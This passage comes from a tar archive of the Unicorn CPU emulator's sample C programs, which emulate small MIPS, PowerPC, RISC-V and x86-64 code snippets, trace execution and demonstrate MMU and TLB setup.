print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_M68K_REG_D0, &d0); uc_reg_read(uc, UC_M68K_REG_D1, &d1); uc_reg_read(uc, UC_M68K_REG_D2, &d2); uc_reg_read(uc, UC_M68K_REG_D3, &d3); uc_reg_read(uc, UC_M68K_REG_D4, &d4); uc_reg_read(uc, UC_M68K_REG_D5, &d5); uc_reg_read(uc, UC_M68K_REG_D6, &d6); uc_reg_read(uc, UC_M68K_REG_D7, &d7); uc_reg_read(uc, UC_M68K_REG_A0, &a0); uc_reg_read(uc, UC_M68K_REG_A1, &a1); uc_reg_read(uc, UC_M68K_REG_A2, &a2); uc_reg_read(uc, UC_M68K_REG_A3, &a3); uc_reg_read(uc, UC_M68K_REG_A4, &a4); uc_reg_read(uc, UC_M68K_REG_A5, &a5); uc_reg_read(uc, UC_M68K_REG_A6, &a6); uc_reg_read(uc, UC_M68K_REG_A7, &a7); uc_reg_read(uc, UC_M68K_REG_PC, &pc); uc_reg_read(uc, UC_M68K_REG_SR, &sr); printf(">>> A0 = 0x%x\t\t>>> D0 = 0x%x\n", a0, d0); printf(">>> A1 = 0x%x\t\t>>> D1 = 0x%x\n", a1, d1); printf(">>> A2 = 0x%x\t\t>>> D2 = 0x%x\n", a2, d2); printf(">>> A3 = 0x%x\t\t>>> D3 = 0x%x\n", a3, d3); printf(">>> A4 = 0x%x\t\t>>> D4 = 0x%x\n", a4, d4); printf(">>> A5 = 0x%x\t\t>>> D5 = 0x%x\n", a5, d5); printf(">>> A6 = 0x%x\t\t>>> D6 = 0x%x\n", a6, d6); printf(">>> A7 = 0x%x\t\t>>> D7 = 0x%x\n", a7, d7); printf(">>> PC = 0x%x\n", pc); printf(">>> SR = 0x%x\n", sr); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_m68k(); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_mips.c�����������������������������������������������������������������0000664�0000000�0000000�00000007761�14675241067�0017340�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate Mips code (big endian) */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define MIPS_CODE_EB "\x34\x21\x34\x56" // ori $at, $at, 0x3456; #define MIPS_CODE_EL "\x56\x34\x21\x34" // ori $at, $at, 0x3456; // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_mips_eb(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r1 = 0x6789; // R1 register printf("Emulate MIPS code (big-endian)\n"); // Initialize emulator in MIPS mode err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, MIPS_CODE_EB, sizeof(MIPS_CODE_EB) - 1); // initialize machine registers uc_reg_write(uc, UC_MIPS_REG_1, &r1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(MIPS_CODE_EB) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u (%s)\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_MIPS_REG_1, &r1); printf(">>> R1 = 0x%x\n", r1); uc_close(uc); } static void test_mips_el(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r1 = 0x6789; // R1 register printf("===========================\n"); printf("Emulate MIPS code (little-endian)\n"); // Initialize emulator in MIPS mode err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, MIPS_CODE_EL, sizeof(MIPS_CODE_EL) - 1); // initialize machine registers uc_reg_write(uc, UC_MIPS_REG_1, &r1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(MIPS_CODE_EL) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u (%s)\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_MIPS_REG_1, &r1); printf(">>> R1 = 0x%x\n", r1); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_mips_eb(); test_mips_el(); return 0; } ���������������unicorn-2.1.1/samples/sample_mmu.c������������������������������������������������������������������0000664�0000000�0000000�00000027726�14675241067�0017171�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <stdio.h> /* * mov rax, 57 * syscall * test rax, rax * jz child * xor rax, rax * mov rax, 60 * mov [0x4000], rax * syscall * * child: * xor rcx, rcx * mov rcx, 42 * mov [0x4000], rcx * mov rax, 60 * syscall */ char code[] = "\xB8\x39\x00\x00\x00\x0F\x05\x48\x85\xC0\x74\x0F\xB8\x3C\x00\x00" "\x00\x48\x89\x04\x25\x00\x40\x00\x00\x0F\x05\xB9\x2A\x00\x00\x00" "\x48\x89\x0C\x25\x00\x40\x00\x00\xB8\x3C\x00\x00\x00\x0F\x05"; static void mmu_write_callback(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { printf("write at 0x%lx: 0x%lx\n", address, value); } static void x86_mmu_prepare_tlb(uc_engine *uc, uint64_t vaddr, uint64_t tlb_base) { uc_err err; uint64_t cr0; uint64_t cr4; uc_x86_msr msr = {.rid = 0xC0000080, .value = 0}; uint64_t pml4o = ((vaddr & 0x00ff8000000000) >> 39) * 8; uint64_t pdpo = ((vaddr & 0x00007fc0000000) >> 30) * 8; uint64_t pdo = ((vaddr & 0x0000003fe00000) >> 21) * 8; uint64_t pml4e = (tlb_base + 0x1000) | 1 | (1 << 2); uint64_t pdpe = (tlb_base + 0x2000) | 1 | (1 << 2); uint64_t pde = (tlb_base + 0x3000) | 1 | (1 << 2); err = uc_mem_write(uc, tlb_base + pml4o, &pml4e, sizeof(pml4o)); if (err) { printf("failed to write pml4e\n"); exit(1); } err = uc_mem_write(uc, tlb_base + 0x1000 + pdpo, &pdpe, sizeof(pdpe)); if (err) { printf("failed to write pml4e\n"); exit(1); } err = uc_mem_write(uc, tlb_base + 0x2000 + pdo, &pde, sizeof(pde)); if (err) { printf("failed to write pde\n"); exit(1); } err = uc_reg_write(uc, UC_X86_REG_CR3, &tlb_base); if (err) { printf("failed to write CR3\n"); exit(1); } err = uc_reg_read(uc, UC_X86_REG_CR0, &cr0); if (err) { printf("failed to read CR0\n"); exit(1); } err = uc_reg_read(uc, UC_X86_REG_CR4, &cr4); if (err) { printf("failed to read CR4\n"); exit(1); } err = uc_reg_read(uc, UC_X86_REG_MSR, &msr); if (err) { printf("failed to read MSR\n"); exit(1); } cr0 |= 1; // enable protected mode cr0 |= 1l << 31; // enable paging cr4 |= 1l << 5; // enable physical address extension msr.value |= 1l << 8; // enable long mode err = uc_reg_write(uc, UC_X86_REG_CR0, &cr0); if (err) { printf("failed to write CR0\n"); exit(1); } err = uc_reg_write(uc, UC_X86_REG_CR4, &cr4); if (err) { printf("failed to write CR4\n"); exit(1); } err = uc_reg_write(uc, UC_X86_REG_MSR, &msr); if (err) { printf("failed to write MSR\n"); exit(1); } } static void x86_mmu_pt_set(uc_engine *uc, uint64_t vaddr, uint64_t paddr, uint64_t tlb_base) { uint64_t pto = ((vaddr & 0x000000001ff000) >> 12) * 8; uint32_t pte = (paddr) | 1 | (1 << 2); uc_mem_write(uc, tlb_base + 0x3000 + pto, &pte, sizeof(pte)); } static void x86_mmu_syscall_callback(uc_engine *uc, void *userdata) { uc_err err; bool *parrent_done = userdata; uint64_t rax; err = uc_reg_read(uc, UC_X86_REG_RAX, &rax); if (err) { printf("failed to read rax\n"); exit(1); } switch (rax) { case 57: /* fork */ break; case 60: /* exit */ *parrent_done = true; uc_emu_stop(uc); return; default: printf("unknown syscall"); exit(1); } if (!(*parrent_done)) { rax = 27; err = uc_reg_write(uc, UC_X86_REG_RAX, &rax); if (err) { printf("failed to write rax\n"); exit(1); } uc_emu_stop(uc); } } void cpu_tlb(void) { uint64_t tlb_base = 0x3000; uint64_t rax, rip; bool parrent_done = false; uint64_t parrent, child; uc_context *context; uc_engine *uc; uc_err err; uc_hook h1, h2; printf("Emulate x86 amd64 code with mmu enabled and switch mappings\n"); err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); exit(1); } uc_ctl_tlb_mode(uc, UC_TLB_CPU); err = uc_context_alloc(uc, &context); if (err) { printf("Failed on uc_context_alloc() with error returned: %u\n", err); exit(1); } err = uc_hook_add(uc, &h1, UC_HOOK_INSN, &x86_mmu_syscall_callback, &parrent_done, 1, 0, UC_X86_INS_SYSCALL); if (err) { printf("Failed on uc_hook_add() with error returned: %u\n", err); exit(1); } // Memory hooks are called after the mmu translation, so hook the physicall // addresses err = uc_hook_add(uc, &h2, UC_HOOK_MEM_WRITE, &mmu_write_callback, NULL, 0x1000, 0x3000); if (err) { printf("Faled on uc_hook_add() with error returned: %u\n", err); } printf("map code\n"); err = uc_mem_map(uc, 0x0, 0x1000, UC_PROT_ALL); // Code if (err) { printf("Failed on uc_mem_map() with error return: %u\n", err); exit(1); } err = uc_mem_write(uc, 0x0, code, sizeof(code) - 1); if (err) { printf("Failed on uc_mem_wirte() with error return: %u\n", err); exit(1); } printf("map parrent memory\n"); err = uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL); // Parrent if (err) { printf("Failed on uc_mem_map() with error return: %u\n", err); exit(1); } printf("map child memory\n"); err = uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL); // Child if (err) { printf("failed to map child memory\n"); exit(1); } printf("map tlb memory\n"); err = uc_mem_map(uc, tlb_base, 0x4000, UC_PROT_ALL); // TLB if (err) { printf("failed to map memory for tlb\n"); exit(1); } printf("set up the tlb\n"); x86_mmu_prepare_tlb(uc, 0x0, tlb_base); x86_mmu_pt_set(uc, 0x2000, 0x0, tlb_base); x86_mmu_pt_set(uc, 0x4000, 0x1000, tlb_base); err = uc_ctl_flush_tlb(uc); if (err) { printf("failed to flush tlb\n"); exit(1); } printf("run the parrent\n"); err = uc_emu_start(uc, 0x2000, 0x0, 0, 0); if (err) { printf("failed to run parrent\n"); exit(1); } printf("save the context for the child\n"); err = uc_context_save(uc, context); printf("finish the parrent\n"); err = uc_reg_read(uc, UC_X86_REG_RIP, &rip); if (err) { printf("failed to read rip\n"); exit(1); } err = uc_emu_start(uc, rip, 0x0, 0, 0); if (err) { printf("failed to flush tlb\n"); exit(1); } printf("restore the context for the child\n"); err = uc_context_restore(uc, context); if (err) { printf("failed to restore context\n"); exit(1); } x86_mmu_prepare_tlb(uc, 0x0, tlb_base); x86_mmu_pt_set(uc, 0x4000, 0x2000, tlb_base); rax = 0; err = uc_reg_write(uc, UC_X86_REG_RAX, &rax); if (err) { printf("failed to write rax\n"); exit(1); } err = uc_ctl_flush_tlb(uc); if (err) { printf("failed to flush tlb\n"); exit(1); } err = uc_emu_start(uc, rip, 0x0, 0, 0); if (err) { printf("failed to run child\n"); exit(1); } err = uc_mem_read(uc, 0x1000, &parrent, sizeof(parrent)); if (err) { printf("failed to read from parrent memory\n"); exit(1); } err = uc_mem_read(uc, 0x2000, &child, sizeof(child)); if (err) { printf("failed to read from child memory\n"); exit(1); } printf("parrent result == %lu\n", parrent); printf("child result == %lu\n", child); uc_close(uc); } static bool virtual_tlb_callback(uc_engine *uc, uint64_t addr, uc_mem_type type, uc_tlb_entry *result, void *user_data) { bool *parrent_done = user_data; printf("tlb lookup for address: 0x%lX\n", addr); switch (addr & ~(0xfff)) { case 0x2000: result->paddr = 0x0; result->perms = UC_PROT_EXEC; return true; case 0x4000: if (*parrent_done) { result->paddr = 0x2000; } else { result->paddr = 0x1000; } result->perms = UC_PROT_READ | UC_PROT_WRITE; return true; default: break; } return false; } void virtual_tlb(void) { uint64_t rax, rip; bool parrent_done = false; uint64_t parrent, child; uc_context *context; uc_engine *uc; uc_err err; uc_hook h1, h2, h3; printf("Emulate x86 amd64 code with virtual mmu\n"); err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); exit(1); } uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL); err = uc_context_alloc(uc, &context); if (err) { printf("Failed on uc_context_alloc() with error returned: %u\n", err); exit(1); } err = uc_hook_add(uc, &h1, UC_HOOK_INSN, &x86_mmu_syscall_callback, &parrent_done, 1, 0, UC_X86_INS_SYSCALL); if (err) { printf("Failed on uc_hook_add() with error returned: %u\n", err); exit(1); } // Memory hooks are called after the mmu translation, so hook the physicall // addresses err = uc_hook_add(uc, &h2, UC_HOOK_MEM_WRITE, &mmu_write_callback, NULL, 0x1000, 0x3000); if (err) { printf("Faled on uc_hook_add() with error returned: %u\n", err); } printf("map code\n"); err = uc_mem_map(uc, 0x0, 0x1000, UC_PROT_ALL); // Code if (err) { printf("Failed on uc_mem_map() with error return: %u\n", err); exit(1); } err = uc_mem_write(uc, 0x0, code, sizeof(code) - 1); if (err) { printf("Failed on uc_mem_wirte() with error return: %u\n", err); exit(1); } printf("map parrent memory\n"); err = uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL); // Parrent if (err) { printf("Failed on uc_mem_map() with error return: %u\n", err); exit(1); } printf("map child memory\n"); err = uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL); // Child if (err) { printf("failed to map child memory\n"); exit(1); } err = uc_hook_add(uc, &h3, UC_HOOK_TLB_FILL, virtual_tlb_callback, &parrent_done, 1, 0); printf("run the parrent\n"); err = uc_emu_start(uc, 0x2000, 0x0, 0, 0); if (err) { printf("failed to run parrent\n"); exit(1); } printf("save the context for the child\n"); err = uc_context_save(uc, context); printf("finish the parrent\n"); err = uc_reg_read(uc, UC_X86_REG_RIP, &rip); if (err) { printf("failed to read rip\n"); exit(1); } err = uc_emu_start(uc, rip, 0x0, 0, 0); if (err) { printf("failed to flush tlb\n"); exit(1); } printf("restore the context for the child\n"); err = uc_context_restore(uc, context); if (err) { printf("failed to restore context\n"); exit(1); } rax = 0; parrent_done = true; err = uc_reg_write(uc, UC_X86_REG_RAX, &rax); if (err) { printf("failed to write rax\n"); exit(1); } err = uc_ctl_flush_tlb(uc); if (err) { printf("failed to flush tlb\n"); exit(1); } err = uc_emu_start(uc, rip, 0x0, 0, 0); if (err) { printf("failed to run child\n"); exit(1); } err = uc_mem_read(uc, 0x1000, &parrent, sizeof(parrent)); if (err) { printf("failed to read from parrent memory\n"); exit(1); } err = uc_mem_read(uc, 0x2000, &child, sizeof(child)); if (err) { printf("failed to read from child memory\n"); exit(1); } printf("parrent result == %lu\n", parrent); printf("child result == %lu\n", child); uc_close(uc); } int main(void) { cpu_tlb(); virtual_tlb(); } ������������������������������������������unicorn-2.1.1/samples/sample_ppc.c������������������������������������������������������������������0000664�0000000�0000000�00000004740�14675241067�0017144�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By simigo79, 2020 */ /* Sample code to demonstrate how to emulate PPC code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define PPC_CODE "\x7F\x46\x1A\x14" // add r26, r6, r3 // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_ppc(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r3 = 0x1234; // R3 register int r6 = 0x6789; // R6 register int r26 = 0x8877; // R26 register (result) printf("Emulate PPC code\n"); // Initialize emulator in PPC mode err = uc_open(UC_ARCH_PPC, UC_MODE_PPC32 | UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, PPC_CODE, sizeof(PPC_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_PPC_REG_3, &r3); uc_reg_write(uc, UC_PPC_REG_6, &r6); uc_reg_write(uc, UC_PPC_REG_26, &r26); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(PPC_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); return; } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_PPC_REG_26, &r26); printf(">>> r26 = 0x%x\n", r26); // close engine when done uc_close(uc); } int main(int argc, char **argv, char **envp) { test_ppc(); return 0; } ��������������������������������unicorn-2.1.1/samples/sample_riscv.c����������������������������������������������������������������0000664�0000000�0000000�00000041120�14675241067�0017501�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* Sample code to demonstrate how to emulate RISCV code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #if 0 $ cstool riscv64 1305100093850502 0 13 05 10 00 addi a0, zero, 1 4 93 85 05 02 addi a1, a1, 0x20 #endif // #define RISCV_CODE "\x13\x05\x10\x00\x93\x85\x05\x02\x93\x85\x05\x02" #define RISCV_CODE "\x13\x05\x10\x00\x93\x85\x05\x02" // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void hook_code3(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); if (address == ADDRESS) { printf("stop emulation\n"); uc_emu_stop(uc); } } static void test_riscv(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint32_t a0 = 0x1234; uint32_t a1 = 0x7890; printf("Emulate RISCV code\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, RISCV_CODE, sizeof(RISCV_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(RISCV_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); uc_close(uc); } static void test_riscv2(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint32_t a0 = 0x1234; uint32_t a1 = 0x7890; printf("Emulate RISCV code: split emulation\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, RISCV_CODE, sizeof(RISCV_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate 1 instruction err = uc_emu_start(uc, ADDRESS, ADDRESS + 4, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); // emulate one more instruction err = uc_emu_start(uc, ADDRESS + 4, ADDRESS + 8, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); uc_close(uc); } static void test_riscv3(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint32_t a0 = 0x1234; uint32_t a1 = 0x7890; printf("Emulate RISCV code: early stop\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, RISCV_CODE, sizeof(RISCV_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code3, NULL, 1, 0); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(RISCV_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); uc_close(uc); } static void test_riscv_step(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint32_t a0 = 0x1234; uint32_t a1 = 0x7890; uint32_t pc = 0x0000; printf("Emulate RISCV code: step\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, RISCV_CODE, sizeof(RISCV_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate 1 instruction err = uc_emu_start(uc, ADDRESS, ADDRESS + 12, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); uc_reg_read(uc, UC_RISCV_REG_PC, &pc); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); if (pc != 0x10004) { printf("Error after step: PC is: 0x%x, expected was 0x10004\n", pc); } // emulate one more instruction err = uc_emu_start(uc, ADDRESS + 4, ADDRESS + 8, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); uc_close(uc); } static void test_riscv_timeout(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint32_t a0 = 0x1234; uint32_t a1 = 0x7890; uint32_t pc = 0x0000; printf("Emulate RISCV code: timeout\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, "\x00\x00\x00\x00\x00\x00\x00\x00", 8); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate 1 instruction with timeout err = uc_emu_start(uc, ADDRESS, ADDRESS + 4, 1000, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_PC, &pc); if (pc != 0x10000) { printf("Error after step: PC is: 0x%x, expected was 0x10004\n", pc); } // emulate 1 instruction with timeout err = uc_emu_start(uc, ADDRESS, ADDRESS + 4, 1000, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_PC, &pc); if (pc != 0x10000) { printf("Error after step: PC is: 0x%x, expected was 0x10004\n", pc); } // now print out some registers printf(">>> Emulation done\n"); uc_close(uc); } static void test_riscv_sd64(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint64_t reg; /* 00813823 sd s0,16(sp) 00000013 nop */ #define CODE64 "\x23\x38\x81\x00\x13\x00\x00\x00" printf("Emulate RISCV code: sd64 instruction\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, CODE64, sizeof(CODE64) - 1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); reg = ADDRESS + 0x100; uc_reg_write(uc, UC_RISCV_REG_SP, ®); reg = 0x11223344; uc_reg_write(uc, UC_RISCV_REG_S0, ®); // execute instruction err = uc_emu_start(uc, 0x10000, -1, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done.\n"); uc_close(uc); } static bool hook_memalloc(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { 